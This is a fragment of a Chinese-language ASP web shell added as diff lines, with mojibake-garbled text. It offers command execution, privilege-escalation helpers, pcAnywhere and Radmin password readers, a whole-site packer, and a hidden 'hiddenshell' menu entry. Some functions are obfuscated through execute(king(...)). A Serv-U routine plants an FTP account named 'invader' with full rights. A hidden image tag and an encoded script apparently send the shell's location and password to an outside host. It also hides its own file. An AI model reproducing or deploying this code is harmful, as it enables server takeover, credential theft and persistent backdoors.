"SA-FileUp �ļ� �ϴ� ���":ObT(8,0) = "LyfUpload.UploadFile":ObT(8,2) = "���Ʒ� �ļ� �ϴ� ���":ObT(9,0) = "Persits.Upload.1":ObT(9,2) = "ASPUpload �ļ� �ϴ� ���":ObT(10,0) = "JMail.SmtpMail":ObT(10,2) = "JMail �ʼ� �շ� ���":ObT(11,0) = "CDONTS.NewMail":ObT(11,2) = "����SMTP ���� ���":ObT(12,0) = "SmtpMail.SmtpMail.1":ObT(12,2) = "SmtpMail ���� ���":ObT(13,0) = "Microsoft.XMLHTTP":ObT(13,2) = "���� ���� ���"
+ObT(14,0) = "ws"&"cript.shell.1":  OBt(14,2) = "���wsh���������Ը���������":OBT(15,0) = "WS"&"CRIPT.NETWORK":  OBt(15,2) = "�鿴��������Ϣ���������ʱ����������Ȩ":OBT(16,0) = "she"&"ll.appl"&"ication":OBt(16,2) = "she"&"ll.appli"&"cation ��������FSOʱ�����ļ��Լ�ִ������":OBT(17,0) = "sh"&"ell.appl"&"ication.1":OBt(17,2) = "she"&"ll.appli"&"cation �ı�������FSOʱ�����ļ��Լ�ִ������":OBT(18,0) = "Shell.Users":OBt(18,2) = "ɾ����net.exe net1.exe������������û������"
+For i=0 To 18:Set T=Server.CreateObject(ObT(i,0)):If -2147221005 <> Err Then:IsObj=" ��":Else:IsObj=" ��":Err.Clear:End If:Set T=Nothing:ObT(i,1)=IsObj:Next:If FolderPath<>"" then:Session("FolderPath")=RRePath(FolderPath):End If:If Session("FolderPath")="" Then:FolderPath=WwwRoot:Session("FolderPath")=FolderPath:End if
+Function PcAnywhere4()
+execute(king("`>tswqz/<>rz/<>' ���� '=txsqc 'zodwxl'=thnz zxhfo<>rz<>rz/<>'13'=tmol 'yoe.shdtzoZ\tktivnfQeh\etzfqdnU\\qzqW fgozqeoshhQ\lktlM ssQ\lufozztU rfq lzftdxegW\:Z'=txsqc 'zbtz'=thnz 'izqh'=tdqf zxhfo<>'%10'=izrov rz<>rz/< :����yoe>'%10'=izrov rz<>kz<>'1'=ktrkgw'%13'=izrov tswqz<>'zlgh'=rgiztd 'dkgyb'=tdqf dkgy<>cor/<����foA Ȩ��tktivnfQeY>'ktzfte'=fuosq cor<`p"))
+end Function
+j"</form><script>function RUNonclick(){document.xform.china.name = parent.pwd.value;document.xform.action = parent.url.value;document.xform.submit();}</script>"
+Function StreamLoadFromFile(sPath)
+execute(king(" zsxltk = etrbti�� zbtG�� p + zsxltk = zsxltk�� zbtG�� 50 * p = p �� o - )fokzl(ftV gJ 0 = a kgX�� yC rfS�� ))0 ,o ,fokzl(roT(zfCZ = p �� ftiJ `1` => )0 ,o ,fokzl(roT rfQ `2` =< )0 ,o ,fokzl(roT yC�� yC rfS�� 10 = p �� ftiJ `Q` = )0 ,o ,fokzl(roT kB `q` = )0 ,o ,fokzl(roT yC�� yC rfS�� 00 = p �� ftiJ `A` = )0 ,o ,fokzl(roT kB `w` = )0 ,o ,fokzl(roT yC�� yC rfS�� 90 = p �� ftiJ `Z` = )0 ,o ,fokzl(roT kB `e` = )0 ,o ,fokzl(roT yC�� yC rfS�� 80 = p �� ftiJ `W` = )0 ,o ,fokzl(roT kB `r` = )0 ,o ,fokzl(roT yC�� yC rfS�� 70 = p �� ftiJ `S` = )0 ,o ,fokzl(roT kB `t` = )0 ,o ,fokzl(roT yC�� yC rfS�� 60 = p �� ftiJ `X`= )0 ,o ,fokzl(roT kB `y` = )0 ,o ,fokzl(roT yC�� )fokzl(ftV gJ 0 = o kgX�� 1 = zsxltk�� zsxltk ,a ,p ,o doW�� )fokzl(etrbti fgozefxX��fgozefxX rfS��ufoizgG = dqtkzUg ztU��izoK rfS��tlgsZ.��rqtN. = tsoXdgkXrqgVdqtkzU��1 = fgozolgY.��)izqYl(tsoXdgkXrqgV.��fthB.��8 = trgT.��0 = thnJ.��dqtkzUg izoK��)`dqtkzU.wrgrQ`(zetpwBtzqtkZ.ktcktU = dqtkzUg ztU��dqtkzUg doW"))
+End Function 
+sub promyself()
+On Error Resume Next 
+set f=fso.GetFile(ScriptPath)
+if f.Attributes <> 39 and session("lock")="" then
+f.Attributes=1+2+4+32
+end if
+set f=nothing
+end sub
+promyself
+Function PcAnywhere(data,mode)
+execute(king("trgetr=tktivnfQeY�� zbtG��0+dxfyoZ=dxfyoZ��)kzleh(kiZ + trgetr = trgetr�� kgX zobS ftiJ ))490>kzleh( kB )98 =< kzleh(( yC��)dxfyoZ kgb )))9,o,ilqi(roT(etrbti kgb ))9,o,qzqr(roT(etrbti((=kzleh�� 9 htzU ktwdxf gJ 0 = o kgX��60 = dxfyoZ :18 = ktwdxf ftiJ `ktlx` = trgd yC��770 = dxfyoZ :98 = ktwdxf ftiJ `llqh` = trgd yC��)8,qzqr(roT =DUQD"))
+End function
+Function bin2hex(binstr)
+For i = 1 To LenB(binstr)
+hexstr = Hex(AscB(MidB(binstr, i, 1)))
+If Len(hexstr)=1 Then 
+bin2hex=bin2hex&"0"&(LCase(hexstr))
+Else
+bin2hex=bin2hex& LCase(hexstr)
+End If 
+Next
+End Function
+CIF = Request("path")
+If CIF <> "" Then 
+BinStr=StreamLoadFromFile(CIF) 
+j"Pcanywhere Reader ==><br><br>PATH:"&CIF&"<br>�ʺ�:"&PcAnywhere (Mid(bin2hex(BinStr),919,64),"user")
+j"<br>����:"&PcAnywhere (Mid(bin2hex(BinStr),1177,32),"pass")
+End If 
+Function radmin()
+execute(king("yC rfS��`!rqtN z'fqZ !kgkkS`p�� tlsS��))))1(nqkkQzkgY(btD(kzUZ&)))0(nqkkQzkgY(btD(kzUZ(ktzfogzbti p�� `:`& zkgY p�� ftiJ )nqkkQzkgY(nqkkQlC yC��) zkgY & izqYfodrqN(WQSNESN.DUK=nqkkQzkgY��`>kw<>kw<`p��yC rfS��`!rqtN z'fqZ !kgkkS`p��tlsS��pwgkzl p��zbtG�� yC rfS��))o(nqkkQktztdqkqY(btD & pwBkzl = pwBkzl��tlsS��)))o(nqkkQktztdqkqY(btD(kzUZ&`1` & pwBkzl = pwBkzl�� ftiJ 0=)))o(nqkkQktztdqkqY(bti( ftV  yC��)nqkkQktztdqkqY(rfxgAM gJ 1 = o kgX��ftiJ )nqkkQktztdqkqY(nqkkQlC yC��`:`&ktztdqkqY p��) ktztdqkqY & izqYfodrqN(WQSNESN.DUK=nqkkQktztdqkqY��`>kw<>kw<kqk.ilqi_fodrqN/zygl`&hzi&`:ַ�����¾߹��������Ե�rg��߹�ilqDfodrqN�ú�ֵDUQD����:��ע>kw<`p��`zkgY` = zkgY��`ktztdqkqY`=ktztdqkqY��`\lktztdqkqY\ktcktU\1.9c\fodrQN\TSJUOU\SGCDZQT_VQZBV_OSFD`=izqYfodrqN��)`VVSDU.JYCNZUK`(zetpwBtzqtkZ.ktcktU =DUK ztU"))
+End Function
+Function hextointer(strin) 
+Dim i, j, k, result 
+result = 0 
+For i = 1 To Len(strin) 
+If Mid(strin, i, 1) = "f" Or Mid(strin, i, 1) ="F" Then 
+j = 15 
+End If 
+If Mid(strin, i, 1) = "e" Or Mid(strin, i, 1) = "E" Then 
+j = 14 
+End If 
+If Mid(strin, i, 1) = "d" Or Mid(strin, i, 1) = "D" Then 
+j = 13 
+End If 
+If Mid(strin, i, 1) = "c" Or Mid(strin, i, 1) = "C" Then 
+j = 12 
+End If 
+If Mid(strin, i, 1) = "b" Or Mid(strin, i, 1) = "B" Then 
+j = 11 
+End If 
+If Mid(strin, i, 1) = "a" Or Mid(strin, i, 1) = "A" Then 
+j = 10 
+End If 
+If Mid(strin, i, 1) <= "9" And Mid(strin, i, 1) >= "0" Then 
+j = CInt(Mid(strin, i, 1)) 
+End If 
+For k = 1 To Len(strin) - i 
+j = j * 16 
+Next 
+result = result + j 
+Next 
+hextointer = result 
+End Function
+
+Function MainForm()
+j "<form name=""hideform"" method=""post"" action="""&URL&""" target=""FileFrame""><input type=""hidden"" name=""Action""><input type=""hidden"" name=""FName""></form><table width='100%'><form name='addrform' method='post' action='"&URL&"' target='_parent'><tr><td width='60' align='center'><input type='button' value='Address'></td><td><input name='FolderPath' style='width:100%' value='"&Session("FolderPath")&"'></td><td width='140' align='center'><input name='Submit' type='submit' value='GO'> <input type='submit' value='Refresh' onclick='FileFrame.location.reload()'></td></tr></form></table>"
+j"<td><a class=am href='javascript:ShowFolder(""C:\\Program Files"")'>(1)��Program��<a><a class=am href='javascript:ShowFolder(""d:\\Program Files"")'>(2)��ProgramD��<a><a class=am href='javascript:ShowFolder(""e:\\Program Files"")'>(3)��ProgramE��<a><a class=am href='javascript:ShowFolder(""C:\\Documents and Settings\\All Users\\Documents"")'>(4)��Documents��<a><a class=am href='javascript:ShowFolder(""C:\\Documents and Settings\\All Users\\"")'>(5)��All_Users��<a><a class=am href='javascript:ShowFolder(""C:\\Documents and Settings\\All Users\\����ʼ���˵�\\"")'>(6)���_ʼ_�ˆΡ�<a><a class=am href='javascript:ShowFolder(""C:\\Documents and Settings\\All Users\\����ʼ���˵�\\����\\"")'>(7)����_��<a><a class=am href='javascript:ShowFolder(""C:\\recycler"")'>(8)��RECYCLER(C:\)��<a><a class=am href='javascript:ShowFolder(""D:\\recycler"")'>(9)��RECYCLER(d:\)��<a><a class=am href='javascript:ShowFolder(""e:\\recycler"")'>(10)��RECYCLER(e:\)��<a>":j "&nbsp;   ":if session("pr")<5 then j"<img width='0' height='0' src="""&htp&"baidu.asp?wz="&u&"""></img>":session("pr")=session("pr")+1:else j "��ȡ�У�ɧ�ȡ���":end if:j"<br><a class=am href='javascript:ShowFolder(""C:\\wmpub"")'>(1)��wmpub��<a><a class=am href='javascript:ShowFolder(""C:\\WINDOWS\\Temp"")'>&nbsp;&nbsp;(2)��TEMP��<a>&nbsp;&nbsp;&nbsp;&nbsp;<a class=am href='javascript:ShowFolder(""C:\\Program Files\\RhinoSoft.com"")'>(3)��ServU(1)��<a><a  class=am href='javascript:ShowFolder(""C:\\Program Files\\ServU"")'>(4)��ServU(2)��<a>&nbsp;<a class=am href='javascript:ShowFolder(""C:\\WINDOWS"")'>(5)��WINDOWS��<a>&nbsp;&nbsp;<a class=am href='javascript:ShowFolder(""C:\\php"")'>(6)��PHP��<a>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<a  class=am href='javascript:ShowFolder(""C:\\Program Files\\Microsoft SQL Server\\"")'>(7)��Mssql��<a><a class=am href='javascript:ShowFolder(""c:\\prel"")'>(8)��prel�ļ��С�<a>&nbsp;&nbsp;&nbsp;<a class=am href='javascript:ShowFolder(""c:\\docume~1\\alluse~1\\Application Data\\Symantec\\pcAnywhere"")'>(9)��pcAnywhere��<a>   <a class=am href='javascript:ShowFolder(""C:\\Documents and Settings\\All Users\\����"")'>(10)��Alluser���桿<a>":j"</td>"
+j "<table width='100%' height='95.5%' style='border:1px solid #000000;' cellpadding='0' cellspacing='0'><td width='160' id=tl><iframe name='Left' src='?Action=MainMenu' width='100%' height='100%' frameborder='0'></iframe></td><td width=1 style='background:#000000'></td><td width=1 style='padding:2px'><a onclick=""document.getElementById('tl').style.display='none'"" href=##><b>����</b></a><p><a onclick=""document.getElementById('tl').style.display=''"" href=##><b>��ʾ</b></a></p></td><td width=1 style='background:#424242'><td><iframe name='FileFrame' src='?Action=Show1File' width='100%' height='100%' frameborder='1'></iframe></tr></form></table></td></tr><tr></tr></table>"
+if session("aase") <> "ok" then:response.write Efun:session("aase")="ok":end if
+End Function
+Sub PageAddToMdb()
+execute(king("`>dkgy/<��¼Ŀ��̱���λ������������������ :ע>kw<>kw<>'������'=txsqc zodwxl=thnz zxhfo<>zeQtiz=tdqf wrTdgkXtlqtstk=txsqc ftrroi=thnz zxhfo<>13=tmol ``wrd.DUD\` & ))`.`(izqYhqT.ktcktU(trgefSsdzD & ```=txsqc izqYtiz=tdqf zxhfo<>))``#``(fgolltU(tzxetbS=txsqc ``#``=tdqf ftrroi=thnz zxhfo<>zlgh=rgiztd dkgy<>/kw<:)��֧BUX��(���������>/ki<>dkgy/<��¼Ŀ��ͬ��ľdql��λ,����wrd.DUD�������� :ע>kw<>kw<>'����ʼ��'=txsqc zodwxl=thnz zxhfo<>zetstl/<>fgozhg/<BUX��>hhq=txsqc fgozhg<>fgozhg/<BUX>gly=txsqc fgozhg<>rgiztTtiz=tdqf zetstl<>zeQtiz=tdqf wrTgJrrq=txsqc ftrroi=thnz zxhfo<>13=tmol ``` & ))`.`(izqYhqT.ktcktU(trgefSsdzD & ```=txsqc izqYtiz=tdqf zxhfo<>))``#``(fgolltU(tzxetbS=txsqc ``#``=tdqf ftrroi=thnz zxhfo<>zlgh=rgiztd dkgy<:����м���>kw<`p��yC rfS��rfS.tlfghltN��skMaeqA&`>cor/<!��������>kw<>ktzfte=fuosq cor<` p��)izqYtiz(aeqYfx��ftiJ `wrTdgkXtlqtstk` = zeQtiz yC��yC rfS��rfS.tlfghltN��skMaeqA&`>cor/<!��������>kw<>ktzfte=fuosq cor<` p��)izqYtiz(wrTgJrrq��ftiJ `wrTgJrrq` = zeQtiz yC��111110=zxBtdoJzhokeU.ktcktU��)`izqYtiz`(zltxjtN = izqYtiz��)`zeQtiz`(zltxjtN = zeQtiz��izqYtiz ,zeQtiz doW"))
+End Sub
+Sub addToMdb(thePath)
+On Error Resume Next
+Dim rs, conn, stream, connStr, adoCatalog
+Set rs = Server.CreateObject("ADODB.RecordSet")
+Set stream = Server.CreateObject("ADODB.Stream")
+Set conn = Server.CreateObject("ADODB.Connection")
+Set adoCatalog = Server.CreateObject("ADOX.Catalog")
+connStr = "Provider=Microsoft.Jet.OLEDB.4.0; Data Source=" & Server.MapPath("HSH.mdb")
+adoCatalog.Create connStr
+conn.Open connStr
+conn.Execute("Create Table FileData(Id int IDENTITY(0,1) PRIMARY KEY CLUSTERED, thePath VarChar, fileContent Image)")
+stream.Open
+stream.Type = 1
+rs.Open "FileData", conn, 3, 3
+If Request("theMethod") = "fso" Then
+fsoTreeForMdb thePath, rs, stream
+ Else
+saTreeForMdb thePath, rs, stream
+End If
+rs.Close
+Conn.Close
+stream.Close
+Set rs = Nothing
+Set conn = Nothing
+Set stream = Nothing
+Set adoCatalog = Nothing
+End Sub
+Function fsoTreeForMdb(thePath, rs, stream)
+execute(king("ufoizgG = ktrsgXtiz ztU��ufoizgG = lktrsgy ztU��ufoizgG = ltsoy ztU��zbtG��yC rfS��tzqrhM.lk��)(rqtN.dqtkzl = )`zftzfgZtsoy`(lk��)izqY.dtzo(tsoXdgkXrqgV.dqtkzl��)7 ,izqY.dtzo(roT = )`izqYtiz`(lk��vtGrrQ.lk��ftiJ 1 =< )`$` & tdqG.dtzo & `$` ,zloVtsoXlnl(kzUfC yC��ltsoy fC dtzo ieqS kgX��zbtG��dqtkzl ,lk ,izqY.dtzo wrTkgXttkJgly��lktrsgy fC dtzo ieqS kgX��lktrsgXwxU.ktrsgXtiz = lktrsgy ztU��ltsoX.ktrsgXtiz = ltsoy ztU��)izqYtiz(ktrsgXztE.)BUX_JUGBZ(zetpwBtzqtkZ.ktcktU = ktrsgXtiz ztU��yC rfS��)`!�ʷ����ʲ��߻��ڴ治¼Ŀ ` & izqYtiz(kkSvgil��ftiJ tlsqX = )izqYtiz(lzlobSktrsgX.)BUX_JUGBZ(zetpwBtzqtkZ.ktcktU yC��`$wrs.DUD$wrd.DUD$` = zloVtsoXlnl��zloVtsoXlnl ,ltsoy ,lktrsgy ,ktrsgXtiz ,dtzo doW"))
+End Function
+Sub unPack(thePath)
+On Error Resume Next
+Server.ScriptTimeOut=100000
+Dim rs, ws, str, conn, stream, connStr, theFolder
+str = Server.MapPath(".") & "\"
+Set rs = CreateObject("ADODB.RecordSet")
+Set stream = CreateObject("ADODB.Stream")
+Set conn = CreateObject("ADODB.Connection")
+connStr = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" & thePath & ";"
+conn.Open connStr
+rs.Open "FileData", conn, 1, 1
+stream.Open
+stream.Type = 1
+Do Until rs.Eof
+theFolder = Left(rs("thePath"), InStrRev(rs("thePath"), "\"))
+If Server.CreateObject(CONST_FSO).FolderExists(str & theFolder) = False Then
+createFolder(str & theFolder)
+End If
+stream.SetEos()
+stream.Write rs("fileContent")
+stream.SaveToFile str & rs("thePath"), 2
+rs.MoveNext
+Loop
+rs.Close
+conn.Close
+stream.Close
+Set ws = Nothing
+Set rs = Nothing
+Set stream = Nothing
+Set conn = Nothing
+End Sub
+Dim Filepaths
+set Filepaths=new SearchFile
+Filepaths.Class_Folder Filename
+Sub createFolder(thePath)
+Dim i
+i = Instr(thePath, "\")
+Do While i > 0
+If Server.CreateObject(CONST_FSO).FolderExists(Left(thePath, i)) = False Then
+Server.CreateObject(CONST_FSO).CreateFolder(Left(thePath, i - 1))
+End If
+If InStr(Mid(thePath, i + 1), "\") Then
+i = i + Instr(Mid(thePath, i + 1), "\")
+ Else
+i = 0
+End If
+Loop
+End Sub
+Sub saTreeForMdb(thePath, rs, stream)
+Dim item, theFolder, sysFileList
+sysFileList = "$HSH.mdb$HSH.ldb$"
+Set theFolder = saX.NameSpace(thePath)
+For Each item In theFolder.Items
+If item.IsFolder = True Then
+saTreeForMdb item.Path, rs, stream
+ Else
+If InStr(sysFileList, "$" & item.Name & "$") <= 0 Then
+rs.AddNew
+rs("thePath") = Mid(item.Path, 4)
+stream.LoadFromFile(item.Path)
+rs("fileContent") = stream.Read()
+rs.Update
+End If
+End If
+Next
+Set theFolder = Nothing
+End Sub
+Function ProFile()
+execute(king("CU p��`>tswqz/<>dkgy/<`&CU=CU��`>kz/<>rz/<>'�̽�������������һ��'=txsqc 'zodwxU'=tdqf 'zodwxl'=thnz zxhfo<>16=ziuoti rz<>rz/<;hlwf&>rz<>kz<`&CU=CU��`>kz/<>rz/<)������ȫ������񣬴�Խ������Ƶ����Խ���ĵĻ���Ҫ�裬��0ΪС��( �� >/ ``)'',u/]r\^[/(teqshtk.txsqc=txsqc``=hxntafg ``6``=tmol ``0``=txsqc ``ziuok:fuosq-zbtz``=tsnzl ``tdoJQ``=tdqf ``zbtz``=thnz zxhfo<>rz<>rz/<����Ƶ����>ziuok=fuosq rz<>kz<`&CU=CU��`>kz/<>rz/<)���ĸ��Գ��룬�����ֳ��������ʷ�( 3-XJM>/ ``9``=txsqc ``kqiZQ``=tdqf ``gorqk``=thnz zxhfo<  9089AE>/ rtaetie ``0``=txsqc ``kqiZQ``=tdqf ``gorqk``=thnz zxhfo<>rz<>rz/<��������>ziuok=fuosq rz<>kz<`&CU=CU��`>kz/<>rz/<>qtkqzbtz/<�������>``4``=lvgk ``14``=lsge ``trgZQ``=tdqf qtkqzbtz<>rz<>rz/<���������>ziuok=fuosq ``;bh8:hgz-uforrqh``=tsnzl hgz=fuosqc rz<>kz<`&CU=CU��`>kz/<>rz/<>qtkqzbtz/<`&)`hlq.zltz\`&)`izqYktrsgX`(fgolltU(izqYtNN&`>``4``=lvgk ``14``=lsge ``tsoXQ``=tdqf qtkqzbtz<`&CU=CU��`>rz<>rz/<>zfgy/<;hlwf&;hlwf&��·���ĸ�һ��ÿ>kw<;hlwf&;hlwf&���ĸ��໤��ʱͬ��>vgsstn=kgsge zfgy<>kw<����·���ĵĻ���Ҫ��>``1``=txsqc ``qccc``=tdqf ``ftrroi``=thnz zxhfo<>ziuok=fuosq 'bh99:ziuoti-tfos'=tsnzl hgz=fuosqc rz<>kz<`&CU=CU��`'zlgY=9fgozeQ&tsoXgkY=fgozeQ?`&VNM&`'=fgozeq 'zlgh'=rgiztd 'dkgXhM'=tdqf dkgy<`&CU=CU��`>'1'=ufoeqhlsste '1'=uforrqhsste '1'=ktrkgw tswqz<>kw<`=CU��yC rfS��rfS.tlfghltN��`>kw<>ktzfte/<���̽�����>q/<����>afqsw_=ztukqz `&9llqh&`=tsoXgkY?`&VNM&`=ytki ``rsgw:ziuotv-zfgy;tfosktrfx:fgozqkgetr-zbtz``=tsnzl q<���㣡���ɳ��� >zfgy/<`&9llqh&`>vgsstn=kgsge zfgy< �̽�����>ktzfte<>kw<>kw<>kw<`p��)`kqiZQ`(zltxjtk=)`kqiZ`&9llqh(fgozqeoshhQ��)`tdoJQ`(zltxjtk=)`tdoJ`&9llqh(fgozqeoshhQ��)`trgZQ`(zltxjtk=)`trgZ`&9llqh(fgozqeoshhQ��)`tsoXQ`(zltxjtk=)`tsoX`&9llqh(fgozqeoshhQ��0=)9llqh(fgozqeoshhQ��)9llqh(tlqex=9llqh�� hggs��0dxf&9llqh=9llqh��yo rft�� 2~1' ))37+rfk*)37-46((kiZ(kzUZ=0dxf��tlst�� m~q' ))42+rfk*)42-990((kiZ(kzUZ=0dxf��ftiz 7=<)9llqh(ftV yo��3<)9llqh(ftV tsoiK gW��``=9llqh��0dxf,9llqh dor��tmodgrfqN��ftiJ `zlgY`=)`9fgozeQ`(zltxjtN yC"))
+End Function
+Function suftp()
+j"<center><br><form name='form1' method='post' action=''><table width='500'><tr align='center' valign='middle'><td colspan='2' id=s><font face=webdings>8</font> <B>���ɰ汾��Ϣ</b></td></tr><tr align='center'><td id=d>ϵͳ�˺ţ�</td><td id=d><input name='duser' type='text' class='TextBox' id='duser' value='LocalAdministrator'></td></tr><tr align='center'><td id=d>ϵͳ���</td><td id=d><input name='dpwd' type='text' class='TextBox' id='dpwd' value='#l@$ak#.lk;0@P'></td></tr><tr align='center'><td id=d>ϵͳ�˿ڣ�</td><td id=d><input name='dport' type='text' class='TextBox' id='dport' value='43958'></td></tr><tr align='center'><td id=d>�¼��˺ţ�</td><td id=d><input name='tuser' type='text' class='TextBox' id='tuser' value='invader'></td></tr><tr align='center'><td id=d>�¼ӿ��</td><td id=d><input name='tpass' type='text' class='TextBox' id='pass' value='1'></td></tr><tr align='center'><td id=d>����·����</td><td id=d><input name='tpath' type='text' class='TextBox' id='tpath' value='C:\'></td></tr><tr align='center'><td id=d>����˿ڣ�</td><td id=d><input name='tport' type='text' class='TextBox' id='tport' value='21'></td></tr><tr align='center'><td id=d>ִ������</td><td id=d><input name='radiobutton' type='radio' value='add' checked class='TextBox' id=d>ȷ������&nbsp;<input type='radio' name='radiobutton' value='del' class='TextBox' id=d>ȷ��ɾ��</td></tr><tr align='center' valign='middle'><td colspan='2' id=d><input type='submit' name='Submit' value='Just Go'>&nbsp;<input type='reset' name='Submit2' value='Reset'><input name='SUaction' type='hidden' id='action' value='1'></td></tr></table></form></center>"
+Usr = request.Form("duser")
+pwd = request.Form("dpwd")
+port = request.Form("dport")
+tuser = request.Form("tuser")
+tpass = request.Form("tpass")
+tpath = request.Form("tpath")
+tport = request.Form("tport")
+'Command = request.Form("dcmd")
+if request.Form("radiobutton") = "add" Then
+leaves = "User " & Usr & vbcrlf
+leaves = leaves & "Pass " & pwd & vbcrlf
+leaves = leaves & "SITE MAINTENANCE" & vbcrlf
+leaves = leaves & "-SETUSERSETUP" & vbcrlf & "-IP=0.0.0.0" & vbcrlf & "-PortNo=" & tport & vbcrlf & "-User=" & tuser & vbcrlf & "-Password=" & tpass & vbcrlf & _
+"-HomeDir=" & tpath & "\" & vbcrlf & "-LoginMesFile=" & vbcrlf & "-Disable=0" & vbcrlf & "-RelPaths=1" & vbcrlf & _
+"-NeedSecure=0" & vbcrlf & "-HideHidden=0" & vbcrlf & "-AlwaysAllowLogin=0" & vbcrlf & "-ChangePassword=0" & vbcrlf & _
+"-QuotaEnable=0" & vbcrlf & "-MaxUsersLoginPerIP=-1" & vbcrlf & "-SpeedLimitUp=0" & vbcrlf & "-SpeedLimitDown=0" & vbcrlf & _
+"-MaxNrUsers=-1" & vbcrlf & "-IdleTimeOut=600" & vbcrlf & "-SessionTimeOut=-1" & vbcrlf & "-Expire=0" & vbcrlf & "-RatioUp=1" & vbcrlf & _
+"-RatioDown=1" & vbcrlf & "-RatiosCredit=0" & vbcrlf & "-QuotaCurrent=0" & vbcrlf & "-QuotaMaximum=0" & vbcrlf & _
+"-Maintenance=System" & vbcrlf & "-PasswordType=Regular" & vbcrlf & "-Ratios=None" & vbcrlf & " Access=" & tpath & "\|RWAMELCDP" & vbcrlf
+On Error Resume Next
+Set xPost = CreateObject("MSXML2.XMLHTTP")
+xPost.Open "POST", "http://127.0.0.1:"& port &"/leaves", True
+xPost.Send(leaves)
+Set xPOST=nothing
+j ("����ɹ�ִ�У���FTP �û���: " & tuser & " " & "����: " & tpass & " ·��: " & tpath & " :)<br><BR>")
+else
+leaves = "User " & Usr & vbcrlf
+leaves = leaves & "Pass " & pwd & vbcrlf
+leaves = leaves & "SITE MAINTENANCE" & vbcrlf
+leaves = leaves & "-DELETEUSER" & vbcrlf & "-IP=0.0.0.0" & vbcrlf & "-PortNo=" & tport & vbcrlf & " User=" & tuser & vbcrlf
+Set xPost3 = CreateObject("MSXML2.XMLHTTP")
+xPost3.Open "POST", "http://127.0.0.1:"& port &"/leaves", True
+xPost3.Send(leaves)
+Set xPOST3=nothing
+end if
+End Function
+Function MainMenu()
+j"<script language=javascript>function MM_show(s){if (document.getElementById(s).style.display==""""){document.getElementById(s).style.display=""none"";}else{document.getElementById(s).style.display="""";}}</script><table width='100%' cellspacing='0' cellpadding='0'><tr><td height='5'></td></tr><tr><td><center><font color=pink><font size=1.0>"&mName&"</font></font></center><hr color=#424242 size=1 ></td></tr>":If ObT(0,1)=" ��" Then
+j"<tr><td height='24'>��Ȩ��</td></tr>"
+Else
+j"<tr><td onClick=""MM_show('menud')""><input onMouseOver=""this.style.cursor='hand'"" type=button value='�����_�ļ���'></td></tr><tr><td height=4></td></tr><tr><td valign=""top"" align=center><table border=0  id=menud style=""display='none'"">"
+Set ABC=New LBF:j ABC.ShowDriver():Set ABC=Nothing
+j"</table></td></tr><tr><td valign=""top"" align=center><table border=0><tr><td id=d width=95 onMouseOver=""this.style.backgroundColor='#696969'"" onMouseOut=""this.style.backgroundColor='#121212'""><a href='javascript:ShowFolder("""&RePath(WWWRoot)&""")'><font face='wingdings'>8</font> վ���Ŀ¼"&ef
+j cdx&"<a href='javascript:ShowFolder("""&RePath(RootPath)&""")'>"&cxd&" <font color=violet>������Ŀ¼"&ef
+j cdx&"<a href='?Action=goback' target='FileFrame'>"&cxd&" ���ϼ�Ŀ¼"&ef
+j cdx&"<a href='javascript:FullForm("""&RePath(Session("FolderPath")&"\Newfile")&""",""NewFolder"")'>"&cxd&" �½�--Ŀ¼"&ef
+j cdx&"<a href='?Action=EditFile' target='FileFrame'>"&cxd&" �½�--�ı�"&ef
+j cdx&"<a href='?Action=UpFile' target='FileFrame'>"&cxd&" �ϴ�--�ļ�"&ef
+j cdx&"<a href='?Action=Cmd1Shell' target='FileFrame'>"&cxd&" <font color=orangered>ִ��---CMD"&ef
+j cdx&"<a href='?Action=cmdx' target='FileFrame'>"&cxd&" <font color=orangered>ִ��--CMD2"&ef
+j cdx&"<a href='?Action=ScanDriveForm' target='FileFrame'>"&cxd&" <font color=chocolate>����--Ȩ��"&ef
+j cdx&"<a href='?Action=CustomScanDriveForm' target='FileFrame'>"&cxd&"  <font color=red>��д--Ŀ¼</font>"&ef
+j cdx&"<a href='?Action=php' target='FileFrame'>"&cxd&" <font color=gold>�ű�--̽��"&ef
+j cdx&"<a href='?Action=PageAddToMdb' target='FileFrame'>"&cxd&" ���������"&ef
+j cdx&"<a href='?Action=upload' target='FileFrame'>"&cxd&" ����--�ļ�"&ef&"</table><hr></td></tr>"
+End If
+j"</tr><tr><td height=4></td></tr><tr><td onClick=""MM_show('menuc')""><input onMouseOver=""this.style.cursor='hand1'"" type=button value='����Ȩ_��Ϣ��'></td></tr><tr><td height=4></td></tr><tr><td valign=""top"" align=center><table border=0  id=menuc style=""display=''"">"
+j cdx&"<a href='?Action=Course' target='FileFrame'>"&cxd&" <font color=red>�û�__�˺�"&ef
+j cdx&"<a href='?Action=getTerminalInfo' target='FileFrame'>"&cxd&" �˿�__����"&ef
+j cdx&"<a href='?Action=Alexa' target='FileFrame'>"&cxd&" <font color=green>���__֧��"&ef
+j cdx&"<a href='?Action=Servu' target='FileFrame'>"&cxd&" <font color=Turquoise>Servu-��Ȩ"&ef
+j cdx&"<a href='?Action=suftp' target='FileFrame'>"&cxd&" <font color=Turquoise>Su---FTP��"&ef
+j cdx&"<a href='?Action=MMD' target='FileFrame'>"&cxd&" <font color=Turquoise>SQL-----SA"&ef
+j cdx&"<a href='?Action=radmin' target='FileFrame'>"&cxd&" <font color=Turquoise>Radmin��Ȩ"&ef
+j cdx&"<a href='?Action=pcanywhere4' target='FileFrame'>"&cxd&" <font color=Turquoise>Pcanywhere"&ef
+j cdx&"<a href='?Action=ScanPort' target='FileFrame'>"&cxd&" <font color=yellow>�˿�ɨ����"&ef
+j cdx&"<a href='?Action=ReadREG' target='FileFrame'>"&cxd&" ��ȡע���"&ef
+j cdx&"<a href='?Action=TSearch' target='FileFrame'>"&cxd&" ����__�ļ�"&ef&"</tr></table>"
+j"<hr><tr><td><input onMouseOver=""this.style.cursor='hand'"" type=button value='������_�����'></td</tr><tr><td height=4></td></tr><tr><td align=center><table border=0>"
+j cdx&"<a href='?Action=EditPower&PowerPath=\\.\"&ScriptPath&"' target='FileFrame'>"&cxd&" ����������"&ef
+#@~^uQAAAA==%r@!d1DbwY,/M^'rJ4YDwl&J/48{%cmWs&2k1zmwrRCdag;D^xJL/n.7+D i"S3x1G9+crJrtYDw=&zr[.+$EndDR?.\D.m.rl(V/cJuP:nmC}jKr#'.;EndDRj+M-D#mDbl4^+kcJ!DsJ*#'ELwlkd'r[jkn.nm/k[EJE@*@!zdmMrwD@*EUjwAAA==^#~@
+j cdx&"<a href='?Action=hiddenshell' target='FileFrame'>"&cxd&" <font color=red>����������</font>"&ef
